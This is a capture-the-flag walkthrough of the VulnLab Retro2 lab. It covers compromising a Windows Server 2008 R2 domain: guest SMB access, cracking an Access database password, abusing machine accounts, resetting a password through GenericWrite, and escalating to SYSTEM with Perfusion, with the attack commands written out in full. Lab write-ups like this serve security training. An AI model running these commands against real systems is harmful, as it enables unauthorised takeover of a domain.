VL-Retro2

Vulnlab Retro2: Legacy Windows Server 2008 R2 Exploitation Through Database Credential Extraction and Machine Account Abuse

In this comprehensive VulnLab walkthrough, I’ll demonstrate how to penetrate the “Retro2” domain environment by exploiting a series of vulnerabilities leading to complete domain compromise. Starting with anonymous SMB access and password-protected Access database cracking, we’ll progress through LDAP enumeration, machine account password manipulation, and ultimately achieve SYSTEM-level access via Windows Registry RPC endpoint mapper privilege escalation. This penetration test showcases several real-world Active Directory attack vectors including guest account enumeration, database credential extraction, machine account exploitation, GenericWrite abuse for password resets, group membership manipulation, and leveraging legacy Windows vulnerabilities for local privilege escalation. The techniques demonstrated highlight common security misconfigurations in older Windows environments that penetration testers should look for during enterprise assessments.

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
PORT      STATE SERVICE      REASON          VERSION
53/tcp    open  domain       syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp    open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos 
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp   open  kpasswd5?    syn-ack ttl 127
593/tcp   open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack ttl 127
3268/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped   syn-ack ttl 127
49154/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC

Host script results:
| smb2-time: 
|   date: 2025-03-11T18:29:27
|_  start_date: 2025-03-11T18:27:35
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 22122/tcp): CLEAN (Timeout)
|   Check 2 (port 47750/tcp): CLEAN (Timeout)
|   Check 3 (port 39335/udp): CLEAN (Timeout)
|   Check 4 (port 23565/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: BLN01
|   NetBIOS computer name: BLN01\x00
|   Domain name: retro2.vl
|   Forest name: retro2.vl
|   FQDN: BLN01.retro2.vl
|_  System time: 2025-03-11T19:29:28+01:00
|_clock-skew: mean: -2h19m57s, deviation: 34m36s, median: -1h59m59s

Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)

Fast exploit

We can see that its Windows Server 2008 R2 trying the most basic exploits for this version we see that its vulnerable to nopac and zerologon

1
nxc smb BLN01.retro2.vl -M zerologon
1
nxc smb BLN01.retro2.vl -u "user" -p "pass" -M nopac

There are plenty tutorials for how to use zerologon and the nopac exploits this blog post will focus on the “intended way”

Foothold

1
netexec smb 10.10.100.199 -u 'guest' -p '' --shares

guest0smb2

1
smbclient //10.10.100.199/Public -U 'guest'

public-shares
There is one file in the DB folder named staff.accdb we will download that file to our system

1
get staff.accdb

The .accdb is a is an Access 2007/2010 Database file used in and opened by Access 2007+, we can use office2john to get the hash and crack it as its password protected

1
office2john staff.accdb
1
john --format=office --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

john-crack
Using the password class08, we unlock the microsoft access database:

1
ldapreader:<REDACTED>

Bloodhound

1
bloodhound-python -u "ldapreader" -p "<REDACTED>" -d retro2.vl -dc BLN01.retro2.vl -ns 10.10.70.92 -c ALL --zip

OR

1
nxc ldap retro2.vl -u 'ldapreader' -p '<REDACTED>' --bloodhound --dns-server <ip> -c All --dns-tcp

The above command will get us a zip file that we will use on bloodhound and find our exploitation path
bloodhound

User

First we will try to use the username as the password lowercase for the machine account fs01$(Refer to this blog post that describes why this happens https://www.xmco.fr/en/active-directory-en/part-5-machine-accounts-in-the-active-directory/)

1
nxc smb retro2.vl -u 'fs01$' -p 'fs01'

fs01-account
we need to change the password so we can use that machine account with the password

1
impacket-changepasswd 'retro2.vl/fs01$':'fs01'@retro2.vl -newpass StrongP@ss1234 -dc-ip BLN01.retro2.vl -p rpc-samr

GenericWrite

We have control over FS01, we can take advantage of the GenericWrite permission we previously identified. Typically, this permission can be abused using one of the following techniques:

  • Shadow Credentials (applicable to Windows Server 2016 and later)
  • Targeted Kerberoasting (only effective if the target’s password is weak and crackable)
  • Resource-Based Constrained Delegation

As we are dealing with a Windows Server 2008 none of them will work so we will use another way we can modify another attribute unicodePwd which allows us to reset the password for “ADMWS01$” (Big thanks to serotonin for this exploitation path https://seriotonctf.github.io/2024/08/25/Retro2-Vulnlab/ )

1
net rpc password 'ADMWS01$' Passw0rd1 -U retro2.vl/'fs01$'%StrongP@ss1234 -S BLN01.retro2.vl

AddMember

We will add the user we own ldapreader to the group Services

1
net rpc group addmem "Services" "ldapreader" -U "retro2.vl"/"ADMWS01$"%"Passw0rd1" -S BLN01.retro2.vl

Then we can just RDP to the machine:

1
xfreerdp /v:10.10.70.92 /u:'ldapreader' /p:'<REDACTED>' /d:retro2.vl /tls-seclevel:0

Priv Escalation

There is a great blog post by itm4n on a no-fix vulnerability
https://itm4n.github.io/windows-registry-rpceptmapper-eop/
https://itm4n.github.io/windows-registry-rpceptmapper-exploit/

Now with a tool named Perfusion we can get a system shell

1
.\Perfusion.exe -c cmd -i

https://api.vulnlab.com/api/v1/share?id=bec17ffc-be95-49d1-915e-35c53826e85f